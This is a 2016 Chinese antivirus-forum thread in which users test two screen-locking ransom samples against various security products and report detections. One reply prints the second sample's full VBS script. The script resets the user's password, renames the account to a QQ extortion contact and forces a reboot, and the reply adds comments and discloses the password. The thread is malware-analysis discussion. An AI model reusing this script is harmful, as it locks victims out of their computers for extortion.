楼主: windows7爱好者
收起左侧

[病毒样本] 两个敲竹杠

  [复制链接]
Microsoftheihei
发表于 2016-7-2 19:50:29 | 显示全部楼层
蜘蛛扫描miss
实机双击全miss不过我是win10在线账户
windows7爱好者
 楼主| 发表于 2016-7-2 20:15:18 | 显示全部楼层
3801187 发表于 2016-7-2 19:19
第二个双击过大BD

JS过了BD
windows7爱好者
 楼主| 发表于 2016-7-2 20:15:58 | 显示全部楼层
共和时代 发表于 2016-7-2 19:47
测试:AVG,诺顿,360卫士。火绒,q管,百度,金山
断网下:火绒查到2个但是防御失败
联网下:火绒同上, ...

360第二个能成功防御吗?
windows7爱好者
 楼主| 发表于 2016-7-2 20:18:57 | 显示全部楼层
第二个过这么多?
哪位大神来解释下原理
@驭龙@lixihong10@aboringman@vm001@翼风Fly@蓝天二号@jasonliul@nick20010117@900703
@大法好
900703
发表于 2016-7-2 20:45:37 | 显示全部楼层
windows7爱好者 发表于 2016-7-2 20:18
第二个过这么多?
哪位大神来解释下原理
@驭龙@lixihong10@aboringman@vm001@翼风Fly@蓝天二号@jasonliul ...


我對這種索機軟體不懂 另外@都失敗囉

@驭龙@lixihong10 @aboringman @vm001 @翼风Fly @蓝天二号 @jasonliul  @nick20010117
DPT1
发表于 2016-7-2 21:58:08 | 显示全部楼层
第一个报毒

第二个

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
windows7爱好者
 楼主| 发表于 2016-7-2 22:04:10 | 显示全部楼层
DPT1 发表于 2016-7-2 21:58
第一个报毒

第二个

毒霸这波可以啊,秒杀好多杀软
nick20010117
发表于 2016-7-2 22:47:08 | 显示全部楼层
KIS 双击miss all
275751198
发表于 2016-7-2 22:52:57 | 显示全部楼层
windows7爱好者 发表于 2016-7-2 20:15
360第二个能成功防御吗?

解压立即报,脚本直接入库
翼风Fly
发表于 2016-7-2 23:01:46 | 显示全部楼层
900703 发表于 2016-7-2 20:45
我對這種索機軟體不懂 另外@都失敗囉

@驭龙@lixihong10 @aboringman @vm001 @翼风Fly @蓝天二 ...

呼叫成功

看了看第二个,vbs文件:
[mw_shl_code=javascript,true] On Error Resume Next
Dim fso,ws,file,shut,password
password="wslk321"
Set fso=Wscript.CreateObject("Scripting.FileSystemObject")
Set ws=Wscript.CreateObject("Wscript.Shell")
fol=fso.GetSpecialFolder(1)
file=fol & "\net.exe"
shut=fol & "\shutdown.exe"
ws.run file & " user %UserName% "+Chr(34) & password & Chr(34),0,True
'上面一行实质调用了 net user
ws.Run "wmic.exe useraccount where name='%username%' call Rename ""加QQ教你破解:1785985366"+Chr(34),0,True
'用户改名
ws.run shut & " /r /f /t 0",0  
'关机走人,用户就只能乖乖的开机交钱
[/mw_shl_code]
非常显而易见,如8楼所述,密码是wslk321
调用了net、wmic命令创建加密的用户,shut可能部分杀软来不及拦截
单步拆开看没有什么威胁,整体来说也不会对系统有什么破坏,也就是骗骗小白而已

评分

参与人数 1人气 +1 收起 理由
windows7爱好者 + 1 我就想知道为撒过那么多主防

查看全部评分

您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2025-5-14 16:14 , Processed in 0.098801 second(s), 16 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表